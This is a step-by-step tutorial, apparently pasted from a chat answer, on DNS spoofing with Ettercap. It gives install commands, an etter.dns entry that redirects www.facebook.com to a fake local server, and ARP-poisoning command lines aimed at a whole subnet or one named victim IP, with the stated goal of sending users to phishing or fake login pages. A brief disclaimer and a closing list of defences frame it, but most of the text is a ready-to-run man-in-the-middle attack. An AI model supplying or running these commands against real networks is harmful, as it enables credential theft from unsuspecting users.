DNS Spoofing with Ettercap (For Ethical Penetration Testing Only)

DNS spoofing is an attack where a hacker tricks a target into visiting a fake website by responding with a forged DNS response. This can be used to redirect users to phishing sites or fake login pages. Use this only on networks you own or have explicit permission to test, as unauthorized use is illegal.

1. Setting Up Ettercap for DNS Spoofing

Step 1: Install Ettercap (If Not Installed)

On Kali Linux or Termux (with a Kali container), you can install Ettercap with:

bash

sudo apt update && sudo apt install ettercap-text-only -y

or

bash

sudo apt install ettercap-graphical -y  # For GUI version

Step 2: Enable IP Forwarding

Before running Ettercap, enable packet forwarding:

bash

echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

This allows packets to be forwarded between victims and the router.

Step 3: Configure DNS Spoofing

  1. Edit the Ettercap DNS Spoofing File
    Open the etter.dns file:

    bash

    sudo nano /etc/ettercap/etter.dns

    Add an entry for the domain you want to spoof. For example, to redirect www.facebook.com to a fake local web server (e.g., 192.168.1.100):

    css

    www.facebook.com   A   192.168.1.100
*.facebook.com     A   192.168.1.100

    Save and exit (CTRL+X, then Y, then ENTER).

  2. Enable DNS Spoofing in Ettercap Open the Ettercap configuration file:

    bash
    sudo nano /etc/ettercap/etter.conf

    Find and enable (uncomment) the line:

    ini

    ec_uid = 0
ec_gid = 0

    Also, ensure the redir_command_on setting is enabled.

2. Running Ettercap for DNS Spoofing

Option 1: Using GUI

  1. Open Ettercap GUI:
    bash

    sudo ettercap -G
  2. Select Unified Sniffing → Choose your network interface (e.g., eth0 or wlan0).
  3. Go to HostsScan for hostsAdd Targets (Router and Victim).
  4. Enable MitM (Man-in-the-Middle)ARP Poisoning.
  5. Go to PluginsManage Plugins → Enable dns_spoof.

Option 2: Using CLI (Command Line)

To perform ARP poisoning and DNS spoofing on an entire subnet:

bash

sudo ettercap -T -q -i wlan0 -M arp:remote // // -P dns_spoof
  • -T → Text mode
  • -q → Quiet mode
  • -i wlan0 → Interface (change if needed)
  • -M arp:remote → ARP poisoning
  • // // → Targets (all devices)
  • -P dns_spoof → Enable DNS spoofing

To target a specific victim and router:

bash

sudo ettercap -T -q -i wlan0 -M arp:remote /192.168.1.1/ /192.168.1.50/ -P dns_spoof

Replace:

  • 192.168.1.1 → Router IP
  • 192.168.1.50 → Victim’s IP

3. Testing the Attack

On the victim’s machine, try accessing www.facebook.com. If the attack is successful, it should redirect to the fake server at 192.168.1.100.

4. How to Protect Against DNS Spoofing

  • Use HTTPS (TLS/SSL) – Prevents interception of login credentials.
  • Use Secure DNS (DoH or DoT) – Encrypts DNS queries.
  • Monitor ARP Tables – Run arp -a to check for inconsistencies.
  • Enable Static ARP Entries – Prevents ARP poisoning.
  • Use Network Intrusion Detection Systems (NIDS) – Tools like Snort can detect ARP spoofing.